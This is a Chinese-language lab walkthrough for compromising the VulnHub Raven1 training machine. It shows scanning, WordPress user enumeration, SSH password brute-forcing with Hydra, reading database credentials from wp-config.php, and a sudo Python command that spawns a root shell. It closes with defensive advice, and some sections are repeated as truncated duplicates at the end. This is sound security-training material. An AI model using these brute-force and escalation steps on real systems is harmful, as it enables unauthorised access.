Raven1 靶场渗透测试教学文档<\/h1>

靶机概述<\/h2>
Raven1 是 VulnHub 上的一个渗透测试靶机，适合初学者练习信息收集、漏洞利用和权限提升等渗透测试技能。本靶机包含多个 flag，需要通过系统性的渗透测试方法逐步获取。<\/p>

环境准备<\/h2>

靶机下载地址：VulnHub Raven1<\/li>
攻击机：Kali Linux<\/li>

网络配置：确保靶机和攻击机在同一网络段<\/li> <\/ul>

信息收集阶段<\/h2>

1. 网络扫描<\/h3>

使用 arp-scan<\/code> 发现目标 IP：<\/p>

arp-scan -l
<\/span><\/span><\/code><\/pre>发现目标 IP 为 192.168.78.144<\/code><\/p>
2. 端口扫描<\/h3>
使用 Nmap 进行全端口扫描：<\/p>
nmap -sT -T4 -Pn 192.168.78.144
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

开放端口：22(SSH)、80(HTTP)、111(RPC)<\/li>
<\/ul>
3. Web 服务枚举<\/h3>
访问 HTTP 服务：<\/p>
http:\/\/192.168.78.144
<\/span><\/span><\/code><\/pre>在 \/server.html<\/code> 页面源代码中发现第一个 flag：<\/p>
f1ag1{b9bbcb33e11b80be759c4e844862482d}
<\/code><\/pre>
4. 目录扫描<\/h3>
使用 dirsearch 扫描 Web 目录：<\/p>
dirsearch -u http:\/\/192.168.78.144
<\/span><\/span><\/code><\/pre>发现 WordPress 目录：\/wordpress<\/code><\/p>
5. WordPress 扫描<\/h3>
使用 WPScan 扫描 WordPress：<\/p>
wpscan --url http:\/\/192.168.78.144\/wordpress -eu
<\/span><\/span><\/code><\/pre>发现两个用户名：<\/p>

steven<\/li>
michael<\/li>
<\/ul>
漏洞利用阶段<\/h2>
1. SSH 爆破<\/h3>
创建用户名字典 user.txt<\/code>：<\/p>
steven
michael
<\/code><\/pre>
使用 Hydra 爆破 SSH：<\/p>
hydra -l michael -P \/usr\/share\/wordlists\/rockyou.txt 192.168.78.144 ssh
<\/span><\/span><\/code><\/pre>成功爆破出密码：<\/p>

用户名：michael<\/li>
密码：michael<\/li>
<\/ul>
2. 获取系统 flag<\/h3>
通过 SSH 登录：<\/p>
ssh michael@192.168.78.144
<\/span><\/span><\/code><\/pre>查找 flag 文件：<\/p>
find \/ -name flag*
<\/span><\/span><\/code><\/pre>发现第二个 flag：<\/p>
\/var\/www\/flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
<\/code><\/pre>
3. 数据库信息获取<\/h3>
查看 WordPress 配置文件：<\/p>
cat \/var\/www\/html\/wordpress\/wp-config.php
<\/span><\/span><\/code><\/pre>发现 MySQL 凭据：<\/p>

用户名：root<\/li>
密码：R@v3nSecurity<\/li>
<\/ul>
4. 数据库查询<\/h3>
登录 MySQL：<\/p>
mysql -u root -pR@v3nSecurity
<\/span><\/span><\/code><\/pre>查询 WordPress 数据库：<\/p>
use wordpress;
<\/span><\/span>select<\/span> *<\/span> from<\/span> wp_posts;
<\/span><\/span><\/code><\/pre>发现两个 flag：<\/p>
flag3{afc01ab56b50591e7dccf93122770cd2}
flag4{715dea6c055b9fe3337544932f2941ce}
<\/code><\/pre>
查询用户表：<\/p>
select<\/span> *<\/span> from<\/span> wp_users;
<\/span><\/span><\/code><\/pre>获取用户密码哈希（需要解密）<\/p>
权限提升阶段<\/h2>
1. 解密用户密码<\/h3>
使用在线工具或 John the Ripper 解密 steven 的密码哈希，得到明文密码：<\/p>
pink84
<\/code><\/pre>
2. 切换用户<\/h3>
切换到 steven 用户：<\/p>
su steven
<\/span><\/span>密码：pink84
<\/span><\/span><\/code><\/pre>3. 检查 sudo 权限<\/h3>
sudo -l
<\/span><\/span><\/code><\/pre>发现 steven 可以以 root 权限执行 Python<\/p>
4. 利用 Python 提权<\/h3>
sudo python -c 'import os; os.system("\/bin\/sh")'<\/span>
<\/span><\/span><\/code><\/pre>成功获取 root shell<\/p>
总结<\/h2>
通过本次渗透测试，我们：<\/p>

通过信息收集发现 WordPress 和用户信息<\/li>
爆破 SSH 获取初始立足点<\/li>
从 WordPress 配置文件中获取数据库凭据<\/li>
查询数据库获取更多 flag 和用户凭据<\/li>
通过 sudo 权限滥用实现权限提升<\/li>
<\/ol>
关键点备忘<\/h2>

不要忽略页面源代码中的隐藏信息<\/li>
配置文件往往包含敏感信息<\/li>
数据库是获取凭证的重要来源<\/li>
定期检查 sudo 权限是提权的关键<\/li>
密码复用是常见的安全问题<\/li>
<\/ol>
防御建议<\/h2>

使用强密码策略<\/li>
限制 SSH 登录尝试<\/li>
保护配置文件权限<\/li>
定期审计 sudo 权限<\/li>
避免密码复用<\/li>
<\/ol>

Raven1 靶场渗透测试教学文档<\/h1>

靶机概述<\/h2> Raven1 是 VulnHub 上的一个渗透测试靶机，适合初学者练习信息收集、漏洞利用和权限提升等渗透测试技能。本靶机包含多个 flag，需要通过系统性的渗透测试方法逐步获取。<\/p>

信息收集阶段<\/h2>

漏洞利用阶段<\/h2>

权限提升阶段<\/h2>

防御建议<\/h2> 使用强密码策略<\/li> 限制 SSH 登录尝试<\/li> 保护配置文件权限<\/li> 定期审计 sudo 权限<\/li> 避免密码复用<\/li> <\/ol>

靶机概述<\/h2>
Raven1 是 VulnHub 上的一个渗透测试靶机，适合初学者练习信息收集、漏洞利用和权限提升等渗透测试技能。本靶机包含多个 flag，需要通过系统性的渗透测试方法逐步获取。<\/p>

防御建议<\/h2>

使用强密码策略<\/li>
限制 SSH 登录尝试<\/li>
保护配置文件权限<\/li>
定期审计 sudo 权限<\/li>
避免密码复用<\/li> <\/ol>